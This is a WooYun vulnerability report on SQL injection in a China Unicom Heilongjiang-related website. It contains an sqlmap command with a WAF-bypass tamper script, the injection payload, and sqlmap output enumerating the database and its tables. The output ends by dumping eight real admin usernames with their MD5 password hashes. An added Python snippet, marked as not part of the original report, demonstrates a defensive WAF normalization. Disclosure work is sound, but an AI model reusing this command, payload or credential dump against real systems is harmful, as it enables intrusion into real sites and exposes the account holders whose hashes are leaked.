
Vulnerability summary

Defect ID: wooyun-2015-0129854

Title: Carrier security: SQL injection bypassing the WAF at Heilongjiang Unicom

Vendor: China Unicom

Author: 路人甲

Submitted: 2015-07-30 12:11

Fixed: 2015-09-17 10:46

Published: 2015-09-17 10:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-07-30: Details sent to the vendor; awaiting vendor handling
2015-08-03: Vendor confirmed; details visible to the vendor only
2015-08-13: Details disclosed to core white hats and experts in the relevant field
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to intern white hats
2015-09-17: Details disclosed to the public

Brief description:

Detailed description:

sqlmap.py -u "http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c" --tamper=space2mssqlblank.py --current-db


There is a WAF in front of the site; adding the tamper script space2mssqlblank.py is enough to get past it.
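The bypass works because the WAF matches on literal spaces while SQL Server also accepts control characters as token separators. As an added example (not part of the original report, and not sqlmap's own code), the Python below shows a whitespace-dependent signature check missing a payload whose spaces were swapped for such characters, and the same check catching it once the parameter is normalized first; the payload, the signature list and the 0x01-0x0F blank set are assumptions constructed for this demonstration.

```python
"""Normalize alternate MSSQL whitespace before WAF signature matching (added example)."""
import re
from urllib.parse import unquote

# Control characters SQL Server accepts between tokens; space2mssqlblank swaps
# spaces for characters in this range (assumed set for this demonstration).
MSSQL_BLANKS = {chr(c) for c in range(0x01, 0x10)}

# Deliberately small, whitespace-dependent signatures; real rule sets are larger.
SIGNATURES = [
    re.compile(r"\bselect\s+\w", re.I),
    re.compile(r"\bcase\s+when\b", re.I),
    re.compile(r"\bunion\s+select\b", re.I),
]

# Constructed sample modelled on the inline-query payload sqlmap reported above.
PAYLOAD = ("(SELECT CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) "
           "ELSE CHAR(48) END))+CHAR(113))")


def tamper_with_blanks(param: str, blank: str = "%01") -> str:
    """Constructed stand-in for the tamper: replace each space with one URL-encoded blank."""
    return param.replace(" ", blank)


def naive_match(raw_param: str) -> bool:
    """Signature check on the decoded value as-is; regex \\s does not cover 0x01-0x08."""
    decoded = unquote(raw_param)
    return any(sig.search(decoded) for sig in SIGNATURES)


def normalize(raw_param: str) -> str:
    """URL-decode, map every MSSQL blank to a space, then collapse runs of whitespace."""
    decoded = unquote(raw_param)
    mapped = "".join(" " if ch in MSSQL_BLANKS else ch for ch in decoded)
    return re.sub(r"\s+", " ", mapped)


def normalized_match(raw_param: str) -> bool:
    """Same signatures, but applied after normalization."""
    return any(sig.search(normalize(raw_param)) for sig in SIGNATURES)


if __name__ == "__main__":
    tampered = tamper_with_blanks(PAYLOAD, "%01")
    print("plain    naive:", naive_match(PAYLOAD), "normalized:", normalized_match(PAYLOAD))
    print("tampered naive:", naive_match(tampered), "normalized:", normalized_match(tampered))
```

Normalizing the decoded parameter (or, equivalently, rejecting control characters in query values outright) removes the whole class of blank-substitution tampers rather than one encoding at a time.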

[Screenshot: 1.jpg]

[Screenshot: 2.jpg]

[Screenshot: 3.jpg]


sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database: 'oyy'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
[16 tables]
+-----------------+
| Admin |
| BigClass_down |
| Download |
| Feedback |
| News |
| SmallClass |
| SmallClass_down |
| WebBasicInfo |
| bigClass |
| book_setup |
| dtproperties |
| gonggao |
| shop_pinglun |
| sogo_link |
| sysconstraints |
| syssegments |
+-----------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
Table: admin
[12 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| Addtime | datetime |
| admin | nvarchar |
| aleave | nvarchar |
| ArticleNum | int |
| bigclassauthorize | nvarchar |
| ID | int |
| LastLogintime | datetime |
| LoginIP | nvarchar |
| LoginNum | int |
| password | nvarchar |
| smallclassauthorize | nvarchar |
| userkey | int |
+---------------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
Table: admin
[8 entries]
+---------+----------------------------------+
| admin | password |
+---------+----------------------------------+
| admin | 0cc175b9c0f1b6a831c399e269772661 |
| liubin | 790a26695c7c9f38fa32d95bfa6b8e4a |
| liujia | b9181c2c34c3a4200643799ded066a29 |
| oyaya | 0cc175b9c0f1b6a831c399e269772661 |
| test | 0cc175b9c0f1b6a831c399e269772661 |
| twhd | 0e263a2a84460a460cc77ee5be06d0ac |
| wangll | 927941f81c139547f7b5ff053498638c |
| zhangll | 3077bb4f20cf94e87aa0796eeb078fe3 |
+---------+----------------------------------+

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-08-03 10:45

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Heilongjiang branch centre, which will coordinate handling with the organisation operating the website.

Latest status:

None yet